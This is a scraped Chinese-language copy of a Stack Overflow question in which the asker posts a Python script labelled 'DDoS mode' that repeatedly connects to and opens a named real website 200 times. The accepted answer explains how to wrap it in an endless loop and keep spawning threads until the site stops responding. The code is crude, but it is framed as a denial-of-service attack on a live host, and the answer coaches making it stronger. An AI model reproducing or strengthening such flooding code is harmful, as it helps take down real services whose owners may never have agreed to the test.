gpt4 book ai didi

python - 一个网页可以同时打开200次吗?

转载 作者:行者123 更新时间:2023-12-01 05:28:37 27 4
gpt4 key购买 nike

我正在尝试使用 python 攻击我的网络服务器。

是否可以同时多次打开网页?我该怎么做?也许使用线程?任何想法?

import time, socket, os, sys, string, webbrowser, thread

def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
curdir = os.getcwd()

print ("DDoS mode loaded")
host="hajnalgroup.com"
port= 80
message="+---------------------------+"
conn= 200
ip = socket.gethostbyname(host)
print ("[" + ip + "]")
print ( "[Attacking " + host + "]" )
def dos():
#pid = os.fork()
ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
webbrowser.open('http://hajnalgroup.com')
#thread.start_new_thread(webbrowser.open("hajnalgroup.com"))
except socket.error:
print("connection failed")
print i, ( "attack just started")
ddos.close()
for i in range(0, conn):
dos()
print("The connections you requested had finished")
if __name__ == "__main__":
answer = raw_input("Do you want to ddos more?")
if answer.strip() in "y Y yes Yes YES".split():
restart_program()
else:
print "bye"

最佳答案

我会执行以下操作:

  1. 在函数中添加 while true:
  2. 将函数定义复制到 Python 解释器
  3. 导入线程
  4. thread.start_new_thread(ddos, ())
  5. 查看您的网页是否有效。如果是,请重复第 4 点,直到不是为止。

这样您就可以大致了解您的服务器有多强大。

关于python - 一个网页可以同时打开200次吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/20827105/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com